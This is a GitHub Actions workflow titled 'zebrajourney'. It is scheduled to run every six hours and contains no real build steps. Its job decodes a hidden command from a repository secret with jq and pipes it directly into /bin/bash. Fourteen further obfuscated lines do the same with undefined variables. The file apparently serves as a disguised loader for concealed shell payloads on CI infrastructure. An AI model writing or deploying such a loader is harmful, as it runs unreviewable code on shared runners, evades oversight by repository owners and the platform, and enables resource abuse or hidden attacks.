name: zebrajourney

on:
  workflow_dispatch:
  schedule:
    - cron: '13 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zebrajourney
        env:
          ettio6646: ${{ secrets.ettio6646 }}
        run: |
          echo $ettio6646 | jq -r .glqc12 | /bin/bash
          echo $ze56514 | jq -r .ewdf04 | /bin/bash
          echo $ch4911 | jq -r .oyqrf0 | /bin/bash
          echo $odei2 | jq -r .f247 | /bin/bash
          echo $i496 | jq -r .kao8 | /bin/bash
          echo $knr6 | jq -r .o588 | /bin/bash
          echo $ohgym8 | jq -r .e31 | /bin/bash
          echo $jw19410 | jq -r .ovkoe19 | /bin/bash
          echo $thk7 | jq -r .kl2 | /bin/bash
          echo $v4 | jq -r .o016 | /bin/bash
          echo $ohqvz3682 | jq -r .sl450 | /bin/bash
          echo $js3042 | jq -r .mwvn6 | /bin/bash
          echo $ftb10458 | jq -r .nffsg79 | /bin/bash
          echo $bnls02 | jq -r .xc05 | /bin/bash
          echo $ut33 | jq -r .pfwsi305 | /bin/bash

